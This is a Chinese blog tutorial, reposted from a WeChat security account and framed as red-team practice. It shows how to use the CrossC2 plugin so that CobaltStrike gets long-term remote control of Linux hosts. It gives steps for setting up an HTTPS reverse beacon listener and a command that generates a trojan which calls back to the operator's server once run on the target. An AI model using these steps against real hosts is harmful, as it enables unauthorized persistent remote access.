工具的使用 | CobaltStrike上线Linux主机(CrossC2)

admin 2021年9月4日06:42:50评论213 views字数 889阅读2分57秒阅读模式
CobaltStrike上线Linux主机(CrossC2)

工具的使用 | CobaltStrike上线Linux主机(CrossC2)



工具的使用 | CobaltStrike上线Linux主机(CrossC2)

写在前面

在红蓝对抗中,我们经常会碰到需要对Linux主机进行长期远控的情况。对于Windows主机,我们可以使用CobaltStrike,那么自然我们会想问,CobaltStrike能否对Linux主机进行长期远控呢?

在上一篇文章中我提到了,CobaltStrike自身上线Linux主机的情况,需要知道对方Linux主机的账号密码或SSH秘钥,并且还需要获取一台其他机器权限作为中继。传送门:CobaltStrike SSH远程登录   

本文中将讲解如何通过在Linux上执行木马反弹一个CobaltStrike类型的shell,这得依赖于一个CobaltStrike的插件CrossC2。

CrossC2插件项目地址:https://github.com/gloxec/CrossC2

注:CrossC2项目官方声明只支持CobaltStrike3.14版本,本人亲测CobaltStrike4.0也可正常上线,但是无法执行其他操作。





工具的使用 | CobaltStrike上线Linux主机(CrossC2)

工具的使用 | CobaltStrike上线Linux主机(CrossC2)

1:首先,访问CrossC2项目地址,下载该项目。

将项目src目录下 genCrossC2.Linux 文件上传到CobaltStrike服务端目录下。

工具的使用 | CobaltStrike上线Linux主机(CrossC2)

工具的使用 | CobaltStrike上线Linux主机(CrossC2)


2:将 CobaltStrike 服务端的.cobaltstrike.beacon_keys下载到 CobaltStrike 客户端目录下。

工具的使用 | CobaltStrike上线Linux主机(CrossC2)
3:由于 Cross C2目前只支持HTTPS Beacon,所以在Listenrs中选择HTTPS进行监听,

服务端开启监听 windows/beacon_https/reverse_https 类型的beacon

工具的使用 | CobaltStrike上线Linux主机(CrossC2)

4:生成木马

./genCrossC2.Linux 监听的IP 监听的端口 null null Linux x64 test

工具的使用 | CobaltStrike上线Linux主机(CrossC2)

5:执行木马上线

工具的使用 | CobaltStrike上线Linux主机(CrossC2)
工具的使用 | CobaltStrike上线Linux主机(CrossC2)

工具的使用 | CobaltStrike上线Linux主机(CrossC2)

责编:vivian

来源:谢公子博客

工具的使用 | CobaltStrike上线Linux主机(CrossC2)




工具的使用 | CobaltStrike上线Linux主机(CrossC2)
工具的使用 | CobaltStrike上线Linux主机(CrossC2)
如果文中有错误的地方,欢迎指出。有想转载的,可以留言我加白名单。
最后,欢迎加入谢公子的小黑屋(安全交流群)(QQ群:783820465)

工具的使用 | CobaltStrike上线Linux主机(CrossC2)


本文始发于微信公众号(谢公子学安全):工具的使用 | CobaltStrike上线Linux主机(CrossC2)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月4日06:42:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   工具的使用 | CobaltStrike上线Linux主机(CrossC2)http://cn-sec.com/archives/483157.html

发表评论

匿名网友 填写信息